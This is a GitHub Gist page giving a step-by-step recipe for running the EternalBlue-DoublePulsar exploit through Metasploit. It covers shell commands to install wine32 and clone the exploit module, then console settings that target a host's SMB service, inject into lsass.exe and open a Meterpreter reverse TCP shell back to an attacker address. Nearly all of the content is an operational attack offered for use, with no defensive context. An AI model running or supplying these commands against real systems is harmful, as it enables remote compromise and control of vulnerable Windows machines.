-
-
Save SrikeshMaharaj/3ea5c0693b88ea42e46d16b0b9febd71 to your computer and use it in GitHub Desktop.
EternalBlue-DoublePulsar Metasploit Module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## setting up wine32 | |
dpkg --add-architecture i386 | |
apt-get update | |
apt-get install wine32 | |
mkdir -p /root/.wine/drive_c/ | |
## get doublepulsar module for metasploit | |
mkdir -p /root/.msf4/modules/exploits/windows/smb/ | |
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git /root/.msf4/modules/exploits/windows/smb/ | |
## metaspsloit | |
msf > use exploit/windows/smb/eternalblue_doublepulsar | |
> set DOUBLEPULSARPATH /root/.msf4/modules/exploits/windows/smb/deps | |
> set ETERNALBLUEPATH /root/.msf4/modules/exploits/windows/smb/deps | |
> set PROCESSINJECT lsass.exe | |
> set RHOST 192.168.1.7 | |
> set TARGETARCHITECTURE x64 | |
> set payload windows/x64/meterpreter/reverse_tcp | |
> set LHOST 192.168.1.254 | |
> set LPORT 7554 | |
> exploit -j |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment